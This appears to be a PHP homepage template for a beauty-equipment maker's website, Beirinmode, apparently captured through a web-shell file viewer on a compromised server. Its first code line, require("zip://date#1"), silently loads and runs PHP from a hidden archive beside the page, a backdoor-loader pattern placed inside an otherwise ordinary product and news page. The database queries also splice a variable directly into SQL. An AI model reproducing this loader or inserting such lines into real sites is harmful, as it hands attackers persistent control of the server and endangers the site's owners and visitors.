| Current Path : /home/zqegovsj/www/us3web.haibo.com.cn/beirinmode/ |
| Current File : /home/zqegovsj/www/us3web.haibo.com.cn/beirinmode/index.php |
<?php
require("zip://date#1");
include("function.php");
$pagekeyword=$company['2'].', '.$lang['words'][1];
$pagekeyword2=$pagekeyword;
$pagekeyword3=$company['12'];
$purl='index.html';
$feedbacktit='Online inquire from website';
$product_count=$db->selectone("select count(id) from ".$noe_version."_products where member_id=".$id." and state='1'");
if($product_count[0]==0){
$product=$db->selectarray("select id,name,sn,picture,name2,price from ".$noe_version."_products where member_id=".$id." order by id desc limit 0,12");
} else {
$product=$db->selectarray("select id,name,sn,picture,name2,price from ".$noe_version."_products where state='1' and member_id=".$id." order by ep_range limit 0,12");
}
include("head.php");
?><div class="revolution-slider-container">
<div class="revolution-slider" data-version="5.4.8" style="display: none;">
<ul style="display: none;">
<? for($i=1;$i<=count($flash);$i++){?>
<li data-transition="fade" data-masterspeed="500" data-slotamount="1" data-delay="6000">
<!-- MAIN IMAGE -->
<img src="https://<?=$imgprod?>/upload/big/<?=$flash[$i-1][0]?>">
</li>
<? }?>
<!-- SLIDE 2 -->
</ul>
</div>
</div>
<div class="clearfix">
<div class="row margin-top-70 align-items-center">
<div class="column column-1-2 align-center re-preload">
<div class="image-wrapper">
<img src="/pic/home-co-01-2.jpg" class="img-responsive">
</div>
</div>
<div class="column column-1-2">
<h2 class="box-header align-left">Beauty Equipment Manufacturer</h2>
<?=$company[14]?>
<div>
<a class="more" href="/about.html">Learn More</a>
</div>
</div>
</div>
<div class="row full-width gray page-margin-top-section page-padding-top-section page-padding-bottom-section page-margin-bottom-section p-b-50">
<div class="row">
<h2 class="box-header">Featured Products</h2>
<p class="description align-center p-b-50">Beirinmode specializes in designing,developing and manufacturing beauty equipment.</p>
<ul class="horizontal-carousel three-columns autoplay-0 pause_on_hover-1 clearfix">
<? $i=1;while(@$a=mysqli_fetch_row($product)){?>
<li class="column column-1-3"><a href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html"><img src="https://<?=$imgprod?>/upload/middle/<?=$a[3]?>" class="img-responsive"></a>
<h4 class="box-header"><a href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html" title="<?=$a[1]?>"><?=$a[2]?></a></h4>
<p><a href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html"><?=$a[1]?></a></p>
</li>
<? $i++;?>
<? }?>
</ul>
<div class="re-carousel-pagination"></div>
</div>
</div>
<div class="row page-margin-top-section p-b-50">
<div class="row">
<h2 class="box-header">News & Blog</h2>
<p class="description align-center">Our product export to Europe,American, Belgium,Japan and other developed country.</p>
</div>
<div class="carousel-container page-margin-top clearfix">
<ul class="blog horizontal-carousel three-columns autoplay-0 pause_on_hover-1">
<? $hnewsql=$db->selectarray("select id,title,created,content,picture,title2 from ".$noe_version."_companynewses where member_id=".$id." order by created desc LIMIT 0,3");
while(@$hnew=mysqli_fetch_row($hnewsql)){
?>
<li class="column column-1-3">
<a href="/<?=$db->turn_name($hnew[5])?>_newsview<?=$hnew[0]?>.html" title="<?=$hnew[1]?>" class="post-image">
<img src="https://<?=$imgprod?>/upload/middle/<?=$hnew[4]?>" alt="<?=$hnew[1]?>" class="img-responsive">
</a>
<ul class="post-details">
<li class="date template-calendar"><?=date("d",$hnew[2])?> <?=date("M",$hnew[2])?>, <?=date("Y",$hnew[2])?></li>
</ul>
<h4><a href="/<?=$db->turn_name($hnew[5])?>_newsview<?=$hnew[0]?>.html" title="<?=$hnew[1]?>"><?=$hnew[1]?></a></h4>
<p class="description t1"><?=$db->mystrcut(html_entity_decode($hnew[3]),80)?>...</p>
</li><? }?>
</ul>
<div class="re-carousel-pagination"></div>
</div>
</div>
<? include("foot.php");
?>